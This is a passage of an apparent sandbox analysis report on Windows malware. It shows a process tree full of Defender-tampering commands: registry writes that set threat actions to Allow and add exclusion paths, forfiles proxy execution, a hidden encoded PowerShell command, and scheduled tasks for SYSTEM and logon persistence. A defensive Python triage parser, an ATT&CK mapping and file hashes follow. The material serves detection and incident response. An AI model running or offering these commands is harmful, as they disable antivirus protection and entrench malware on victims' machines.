(x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
[depth 3] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

[depth 4] C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32

[depth 3] C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64
[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "gPqHyUjhD" /SC once /ST 12:18:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
    - Creates scheduled task(s)

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "gPqHyUjhD"

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "gPqHyUjhD"

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 14:52:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exe\" aV /TBOzdidWI 385118 /S" /V1 /F
    - Creates scheduled task(s)

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /run /I /tn "yfARWRprRqUFWeTGf"
[depth 1] C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

[depth 1] C:\Users\Admin\AppData\Roaming\explorer.exe
    C:\Users\Admin\AppData\Roaming\explorer.exe

[depth 1] C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe
    C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

[depth 2] C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

[depth 2] C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force

[depth 1] C:\Windows\system32\gpscript.exe
    gpscript.exe /RefreshSystemParam

[depth 1] C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exe
    C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\vHQYyqX.exe aV /TBOzdidWI 385118 /S
[depth 2] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 5] \??\c:\windows\SysWOW64\reg.exe
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process -WindowStyle Hidden gpupdate.exe /force

[depth 6] C:\Windows\SysWOW64\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "biPxHmULFllsbMgnpt"
[depth 2] C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &

[depth 3] C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"

[depth 4] C:\Windows\SysWOW64\cmd.exe
    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

[depth 5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

[depth 6] C:\Windows\SysWOW64\Wbem\WMIC.exe
    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True

[depth 2] C:\Windows\SysWOW64\schtasks.exe
    schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\dLFkbD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F
    - Creates scheduled task(s)
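The tree above is one defence-impairment sequence. A PowerShell-wrapped chain of REG ADD writes under HKLM\SOFTWARE\Policies\Microsoft\Windows Defender sets ThreatIDDefaultAction to 6 (Defender's "Allow" action) for a fixed list of threat IDs and adds Exclusions\Paths entries for every drop directory; gpupdate /force makes the policy take effect at once; forfiles is used as a proxy so the reg.exe and powershell.exe children hang off cmd.exe rather than off the payload; a WMIC call against MSFT_MpPreference removes an "exe" extension exclusion; and schtasks runs the dropped vHQYyqX.exe as SYSTEM and registers an ONLOGON rundll32 task for dLFkbD.dll. What follows is an added example, not code from the sandbox report or from any of the families named in it: a Python triage script that parses command lines of exactly these shapes and returns what a responder would pivot on (threat IDs set to Allow, excluded paths, scheduled tasks, the decoded -EncodedCommand). It generalises past this report in that the same parser works on Sysmon event 1 or 4688 command-line fields. The SAMPLE_LINES are constructed from the tree above (the PowerShell chain cut to two REG ADDs), the function names and indicator labels are this example's own, and the THREAT_ACTIONS table holds the ThreatIDDefaultAction values as Microsoft documents them.

```python
"""Triage of the Defender-tampering command lines in the process tree above.

Added example: not code from the sandbox report or from any family named in
it.  Function names, SAMPLE_LINES (constructed from the report) and the
indicator labels are this example's own.
"""
import base64
import re

DEFENDER_POLICY = "hklm\\software\\policies\\microsoft\\windows defender"

# ThreatIDDefaultAction data values as Microsoft documents them for the
# Defender policy; the sample writes 6 ("Allow") for every threat ID.
THREAT_ACTIONS = {"1": "Clean", "2": "Quarantine", "3": "Remove", "6": "Allow",
                  "8": "UserDefined", "9": "NoAction", "10": "Block"}

# One REG ADD with a quoted key (every instance in the tree is quoted);
# the options end at the ';' or '&' that chains the next command.
REG_ADD = re.compile(r'(?i)\breg(?:\.exe)?"?\s+add\s+"(?P<key>[^"]+)"(?P<opts>[^;&]*)')
REG_OPT = re.compile(r'(?i)/(?P<name>[vtd])\s+(?:"(?P<q>[^"]*)"|(?P<u>[^\s"]+))')
ENCODED = re.compile(r'(?i)-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})')


def unescape(cmdline):
    """Undo the backslash-quote escaping that cmd/powershell/cmd nesting adds."""
    return cmdline.replace('\\"', '"')


def parse_reg_adds(cmdline):
    """Every REG ADD in one command line (the PowerShell chain carries 28)."""
    rows = []
    for m in REG_ADD.finditer(unescape(cmdline)):
        opts = {}
        for o in REG_OPT.finditer(m.group("opts")):
            opts[o.group("name").lower()] = o.group("q") if o.group("q") is not None else o.group("u")
        rows.append({"key": m.group("key"), "value": opts.get("v"),
                     "type": opts.get("t"), "data": opts.get("d")})
    return rows


def decode_encoded_command(cmdline):
    """PowerShell -EncodedCommand is base64 over UTF-16LE, not UTF-8."""
    m = ENCODED.search(cmdline)
    return base64.b64decode(m.group(1)).decode("utf-16-le") if m else None


def triage(cmdline):
    """(indicator, subject, detail) tuples for one command line."""
    text = unescape(cmdline)
    low = text.lower()
    found = []
    for r in parse_reg_adds(cmdline):
        key = r["key"].lower()
        if not key.startswith(DEFENDER_POLICY):
            continue
        if key.endswith("\\threats\\threatiddefaultaction"):
            found.append(("defender_threat_action", r["value"],
                          THREAT_ACTIONS.get(r["data"], r["data"])))
        elif "\\exclusions\\" in key:
            found.append(("defender_exclusion", key.rsplit("\\", 1)[1], r["value"]))
        else:
            found.append(("defender_policy_write", key, r["value"]))
    decoded = decode_encoded_command(text)
    if decoded is not None:
        found.append(("encoded_command", decoded, None))
    if "forfiles" in low and "/c " in low:  # LOLBin proxy: children appear under cmd.exe
        m = re.search(r"/m\s+(\S+)", low)
        found.append(("forfiles_proxy_exec", m.group(1) if m else None, None))
    if "msft_mppreference" in low:
        found.append(("wmic_defender_preference", "remove" if "call remove" in low else "call", None))
    if "schtasks" in low and "/create" in low:
        tn = re.search(r'/tn\s+"?([^"\s]+)', text, re.I)
        ru = re.search(r'/ru\s+"?([^"\s]+)', text, re.I)
        sc = re.search(r'/sc\s+(\S+)', text, re.I)
        found.append(("scheduled_task", tn.group(1) if tn else None,
                      f"{ru.group(1) if ru else 'caller'}/{sc.group(1) if sc else '?'}"))
    return found


def summarize(lines):
    """Aggregate over a whole tree: what was allowed, excluded and scheduled."""
    out = {"allowed_threat_ids": set(), "excluded_paths": set(), "tasks": {}, "other": set()}
    for line in lines:
        for kind, subject, detail in triage(line):
            if kind == "defender_threat_action" and detail == "Allow":
                out["allowed_threat_ids"].add(subject)
            elif kind == "defender_exclusion" and subject == "paths":
                out["excluded_paths"].add(detail)
            elif kind == "scheduled_task":
                out["tasks"][subject] = detail
            else:
                out["other"].add(kind)
    return out


# Constructed from the tree above; the PowerShell chain is cut to two REG ADDs.
SAMPLE_LINES = [
    r'powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;'
    r'REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;"',
    r'"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gPqHyUjhD" /SC once /ST 12:18:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"',
    r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True',
    r'schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\zgoZGMcaU\dLFkbD.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "JHJXtPPPvDXVqpH" /V1 /F',
]

if __name__ == "__main__":
    for k, v in summarize(SAMPLE_LINES).items():
        print(f"{k}: {sorted(v) if isinstance(v, set) else v}")
```

Fed every command line of the tree above, summarize collapses the /reg:32 and /reg:64 duplicates and returns 17 distinct threat IDs set to Allow (the 14 in the PowerShell chain plus three more from the forfiles stage) and the ten excluded paths; the -EncodedCommand blob in the gPqHyUjhD task decodes to the same "start-process -WindowStyle Hidden gpupdate.exe /force" that the forfiles stage later runs in clear text. On a live host the same policy values should be read back from the registry after remediation, since the Group Policy keys override whatever Set-MpPreference reports.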
MITRE ATT&CK Matrix ATT&CK v13 (technique, number of matching signatures)
Persistence
  Create or Modify System Process (2)
    Windows Service (2)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Privilege Escalation
  Create or Modify System Process (2)
    Windows Service (2)
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
Defense Evasion
  Modify Registry (3)
  Virtualization/Sandbox Evasion (2)
  Impair Defenses (1)
    Disable or Modify System Firewall (1)
  Subvert Trust Controls (1)
    Install Root Certificate (1)
Credential Access
  Unsecured Credentials (4)
    Credentials In Files (3)
    Credentials in Registry (1)
Downloads
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
  Filesize: 2.0MB
  MD5:    7be838f4ac8539526013b533ba6db887
  SHA1:   2e946b83e4449d2c0b15a7bf349e10a91e12f943
  SHA256: a22b2c46b1ca89e55eb80770192f2c0364604274f9f7c4c2690d08360e0a97bc
  SHA512: 437a2f6023ebd95a720b8a53af676b9e46bef33e0115ce13c63b0c374375cb916eef2e2511e9ef559941f07ce5e3f8f73149d8c3588950322d14c3205be0972b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
  Filesize: 187B
  MD5:    2a1e12a4811892d95962998e184399d8
  SHA1:   55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
  Filesize: 136B
  MD5:    238d2612f510ea51d0d3eaa09e7136b1
  SHA1:   0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5:    0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1:   6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5:    ae626d9a72417b14570daa8fcd5d34a4
  SHA1:   c103ebaf4d760df722d620df87e6f07c0486439f
  SHA256: 52cc3f3028fab0d347a4a3fffef570b42f85748176d81a3344996d42fd1de32a
  SHA512: a0690bda318bdf43d6f292f88d4ea2ebeec83b95e9ebca80083dbb08e7ddcdb9735cc58b89d369a34f10acf8a114d4a207ed8d0f070c5baf87c5798e9f35bc14

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  Filesize: 2KB
  MD5:    ac4917a885cf6050b1a483e4bc4d2ea5
  SHA1:   b1c0a9f27bd21c6bbb8e9be70db8777b4a2a640f
  SHA256: e39062a62c3c7617feeeff95ea8a0be51104a0d36f46e44eea22556fda74d8d9
  SHA512: 092c67a3ecae1d187cad72a8ea1ea37cb78a0cf79c2cd7fb88953e5990669a2e871267015762fd46d274badb88ac0c1d73b00f1df7394d89bed48a3a45c2ba3d

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
  Filesize: 19KB
  MD5:    170a2db07db8bc1268950cdf3016c2b3
  SHA1:   2543a38964a29e411b91bdfe36ce1573caf8f252
  SHA256: 1f8533175db21faf8e1af7e1c382cf64c68d9f0924ac171f2cfe16ae631f62ce
  SHA512: 734759cc0842b114a22736068a1c7aa555fc662b433d540d4702d2e648b9dfebb4e3b0c7e51647229330a0802418ac7d5d36e317a814c033b2837390aa7904bd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5:    b3a83d0196afc480a90a1e7444210036
  SHA1:   6376ef283df20976769287b3bdc6bcd5d5ce371f
  SHA256: 3ac4190b1c447f3b5365b056150575ec779ffba10b82d940c93009e2f6809a07
  SHA512: dfff8f23370ae8ab390b8a3dd675dd71ca6a8d0fac0f0c9a8b43453763ba5fa96a79a4b5a8891bcac86996471b912ca51dfc6b877d647391d14e355191d77370

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5:    ca9cf1c14e59bbcacaeac0ac0d6e1a29
  SHA1:   bc465bc5184ada2bf6580b2534a5f6c1094b4db2
  SHA256: e148d1170e4af21b6c768b53cde31475ba0e8ee062c58ff914bcb44676bc95eb
  SHA512: b863232c51415853a664e7d67143139f36ae379eec46629f0f7fd860043498c22dc31dc17987c42c523cdaca8ac99ffb47507caab4b3da70a95a21d261351252

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 944B
  MD5:    80b42fe4c6cf64624e6c31e5d7f2d3b3
  SHA1:   1f93e7dd83b86cb900810b7e3e43797868bf7d93
  SHA256: ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d
